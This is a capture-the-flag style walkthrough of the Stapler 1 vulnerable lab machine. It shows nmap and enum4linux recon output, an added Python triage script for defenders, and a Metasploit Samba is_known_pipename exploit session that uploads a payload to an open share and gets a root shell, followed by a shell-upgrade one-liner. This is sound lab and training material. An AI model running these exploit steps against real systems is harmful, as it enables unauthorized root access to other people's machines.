Stapler 1 vulnerable machine walkthrough.
Firing the recon script returns:
Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-27 07:35 EST
Nmap scan report for 192.168.31.147
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
|_ message2.jpgUT
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01."{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
enum4linux also finds:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
[+] Attempting to map shares on 192.168.31.147
//192.168.31.147/print$ Mapping: DENIED, Listing: N/A
//192.168.31.147/kathy Mapping: OK, Listing: OK
//192.168.31.147/tmp Mapping: OK, Listing: OK
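As an added example (not part of the original walkthrough), here is a small Python triage that parses the nmap and enum4linux output above and flags what a defender should fix first: the anonymous FTP login and the shares that map without credentials, which is exactly the foothold the Samba module used later in this post relies on. The input is a constructed sample copied from the output above.

```python
import re

# Constructed sample: the relevant nmap port lines and the enum4linux share
# mapping from the recon above, trimmed to what the triage needs.
NMAP_OUTPUT = """\
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
"""

ENUM4LINUX_OUTPUT = """\
//192.168.31.147/print$ Mapping: DENIED, Listing: N/A
//192.168.31.147/kathy Mapping: OK, Listing: OK
//192.168.31.147/tmp Mapping: OK, Listing: OK
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
SHARE_RE = re.compile(r"^//[^/]+/(\S+)\s+Mapping:\s+(\w+),\s+Listing:\s+(\S+)$")


def triage(nmap_text, enum_text):
    """Return a list of (severity, message) findings about unauthenticated exposure."""
    findings = []
    smb_open = False
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, svc, ver = m.groups()
            if svc in ("netbios-ssn", "microsoft-ds"):
                smb_open = True
                findings.append(("medium", f"SMB exposed on {port}: {ver}"))
            elif svc == "mysql":
                findings.append(("medium", f"MySQL reachable on {port}: {ver}"))
        elif "Anonymous FTP login allowed" in line:
            findings.append(("high", "anonymous FTP login allowed"))
    for line in enum_text.splitlines():
        m = SHARE_RE.match(line)
        # A share that maps and lists with no credentials is the first thing to
        # check for write access; with SMB exposed it is a high-priority fix.
        if m and m.group(2) == "OK":
            sev = "high" if smb_open else "medium"
            findings.append((sev, f"share '{m.group(1)}' maps without credentials"))
    return findings


if __name__ == "__main__":
    for sev, msg in triage(NMAP_OUTPUT, ENUM4LINUX_OUTPUT):
        print(f"[{sev}] {msg}")
```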
I try the low-hanging fruit from my GitHub page and it's a win.
msf > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > setg RHOST 192.168.31.147
RHOST => 192.168.31.147
msf exploit(linux/samba/is_known_pipename) > options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.31.147 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
SMB_SHARE_NAME => /tmp
msf exploit(linux/samba/is_known_pipename) > run
[*] 192.168.31.147:139 - Using location \\192.168.31.147\tmp\ for the path
[*] 192.168.31.147:139 - Retrieving the remote path of the share 'tmp'
[*] 192.168.31.147:139 - Share 'tmp' has server-side path '/var/tmp'
[*] 192.168.31.147:139 - Uploaded payload to \\192.168.31.147\tmp\IQqlqbox.so
[*] 192.168.31.147:139 - Loading the payload from server-side path /var/tmp/IQqlqbox.so using \\PIPE\/var/tmp/IQqlqbox.so...
[-] 192.168.31.147:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 - Loading the payload from server-side path /var/tmp/IQqlqbox.so using /var/tmp/IQqlqbox.so...
[-] 192.168.31.147:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 - Uploaded payload to \\192.168.31.147\tmp\IxhxfTZL.so
[*] 192.168.31.147:139 - Loading the payload from server-side path /var/tmp/IxhxfTZL.so using \\PIPE\/var/tmp/IxhxfTZL.so...
[-] 192.168.31.147:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 - Loading the payload from server-side path /var/tmp/IxhxfTZL.so using /var/tmp/IxhxfTZL.so...
[+] 192.168.31.147:139 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.168.31.139:40411 -> 192.168.31.147:139) at 2018-02-27 08:32:10 -0500
id
uid=0(root) gid=0(root) groups=0(root)
That was fast, but no pain means no gain.
I upgrade and beautify the shell and print the flag:
python -c 'import pty; pty.spawn("/bin/bash")'